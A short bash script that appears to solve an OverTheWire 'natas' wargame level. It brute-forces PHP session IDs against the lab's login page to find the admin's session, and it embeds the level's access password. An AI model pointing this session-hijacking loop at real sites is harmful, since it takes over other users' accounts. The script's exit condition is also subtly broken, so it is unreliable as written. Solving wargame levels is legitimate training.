#!/usr/bin/env bash

#curl -v --cookie "USER_TOKEN=Yes" http://127.0.0.1:5000/

USERNAME="admin"
PASSWORD="arbitrary"

req() {
  local SESSION_ID=$1
  curl http://natas18.natas.labs.overthewire.org/index.php \
       -X POST \
       -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
       -d "username=$USERNAME" \
       -d "password=$PASSWORD" \
       --cookie "PHPSESSID=$SESSION_ID" \
       -sS \
    | grep "regular user" &>/dev/null
}

MIN_ID=0
MAX_ID=640
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
    printf "Attempt: %2d" $i
    req "$i" && echo -en '\r' || $(echo " [admin]"; break)
    
done